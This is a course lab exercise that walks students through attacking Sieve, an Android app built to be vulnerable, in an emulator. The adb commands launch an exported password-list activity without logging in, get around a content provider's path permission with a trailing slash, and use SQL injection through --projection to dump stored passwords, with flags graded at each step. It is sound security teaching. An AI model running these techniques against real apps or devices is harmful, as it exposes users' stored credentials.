M 511: Exploiting a Vulnerable App (20 pts)

What You Need for This Project

Purpose

To practice exploiting various common app vulnerabilities.

Launch an Android Emulator

For most students, this will be the Android Studio emulator.

Installing Sieve

We'll use an intentionally vulnerable app.

On your host system, in a Web browser, go to

https://github.com/ReversecLabs/sieve/releases

Download sieve.apk The app downloads.

Troubleshooting

If that download link fails, use this alternate download link:
sieve.apk

Drag the sieve.apk file and drop it on your running Android emulator.

Connecting to your Android Device with ADB

In a Terminal or Command Prompt, move to the platform-tools directory, as you did in a previous project, and execute this command: 
./adb devices
You should see your emulator listed, as shown below.

Putting Passwords into Sieve

On your Android device, launch Sieve.

A "Welcome!" screen appears, as shown below.

Enter a password of Password12345678 in both fields and click Submit.

On the "Enter PIN" page, enter a PIN of 4567 in both fields and click Submit.

In the next page, enter a password of Password12345678 and click "Sign in".

On the next page, tap the ADD button, as shown below.

Enter some test data, as shown below, and click Save.

If a "Google Password Manager" screen pops up, click Never.

Don't put any real passwords into this app, of course, because they will be revealed later in the project.

Viewing the AndroidManifest.xml File

If you don't already have it running, launch Android Studio.

If you don't have it installed, get it from

https://developer.android.com/studio/

Drag the seive.apk file and drop it on the center pane of Android Studio.

In the top section, click AndroidManifest.xml. Its contents appear in the lower pane, as shown below.

M 511.1: Pemission (5 pts)

In the AndroidManifest.xml file, find the permission shown below.

The flag is covered by a green rectangle in the image below.

Viewing Activities

Look in the AndroidManifest.xml file, and find the first two Activities.

They are named MainLoginActivity and FileSelectActivity, and they are both exported, as shown below.

Scroll down to see the third exported activity, named PWList.

Exploiting a Published Activity

On your Android emulator, at the bottom, click the square icon, or drag up from the bottom of the screen.

This shows the running apps. Drag Sieve up and throw it away. This closes Sieve.

In your Terminal or Command Prompt, execute this command: 

adb shell am start -n com.withsecure.example.sieve/.activity.PWList
The password list page opens on your emulator, without asking for a password first, as shown below.

This is an information disclosure exploit, exposing confidential information to a user who has not logged in.

Finding Content Providers

In Android Studio, find the content providers shown below: DBContentProvider and FileBackupProvider.

They are both exported.

Installing Java

Get Java from:

https://java.com

Installing JADX

Download JADX from:

https://sourceforge.net/projects/jadx.mirror/

It downloads as a ZIP file.

To unzip it:

In the unzipped folder, open the bin subfolder.

To launch the program:

Finding URIs

To exploit content providers, we need the URIs that point to their contents.

In JADX, click File, Open. Open the sieve.apk file.

Click the Search icon, outlined in green in the image below.

Search for content:// as shown below.

Three URIs are found.

Viewing Passwords

In your Terminal or Command Prompt, execute this command: 
adb shell content query --uri content://com.withsecure.example.sieve.provider.DBContentProvider/Passwords
The response contains a username and email address, but the password is an encrypted BLOB, as shown below.

Viewing Keys

In your Terminal or Command Prompt, execute this command: 
adb shell content query --uri content://com.withsecure.example.sieve.provider.DBContentProvider/Keys
You see an error message, saying you don't have permission to see them, as shown below.

Understanding Path Permissions

In Android Studio, examine the permissions for DBContentProvider.

As shown below, the permissions are defined with this line:

android:path="/Keys"

In a Web browser, go to

https://developer.android.com/guide/topics/manifest/path-permission-element

The "path" permissions are explained, as shown below.

These permissions only apply if the exact path ends in /Keys .

M 511.2: Viewing Keys/ (10 pts)

In your Terminal or Command Prompt, execute this command: 
adb shell content query --uri content://com.withsecure.example.sieve.provider.DBContentProvider/Keys/
You see the password, as shown below.

The flag is covered by a green rectangle in the image below.

Triggering a SQL Error

The content providers use SQLite, which is vulnerable to SQL injection.

In your Terminal or Command Prompt, execute these commands: 

adb shell 

content query --uri \
content://com.withsecure.example.sieve.provider.DBContentProvider/Passwords/ \
--projection "'"
If you see a "no closing quote" error, add a backslash before the apostrophe near the end of the command, as shown below. The reply shows"SQLiteException: unrecognized token", highlighted in the image below.

This error indicates a SQL injection vulnerability.

Enumerating Table Names

Execute this command to list the table names in the database: 
content query \
--uri content://com.withsecure.example.sieve.provider.DBContentProvider/Passwords \
--projection "* FROM SQLITE_MASTER WHERE type='table';--"
There are three tables, including Passwords and Key, as shown below.

M 511.3: Viewing Passwords (5 pts)

In your Terminal or Command Prompt, execute this command: 
content query \
--uri content://com.withsecure.example.sieve.provider.DBContentProvider/Passwords \
--projection "* FROM Passwords;--"
You see the password, as shown below.

The flag is covered by a green rectangle in the image below.

Sources

Drozer
drozer user guide
Posted 10-3-22, updated 5:52 pm
Extensively updated and video added 10-15-25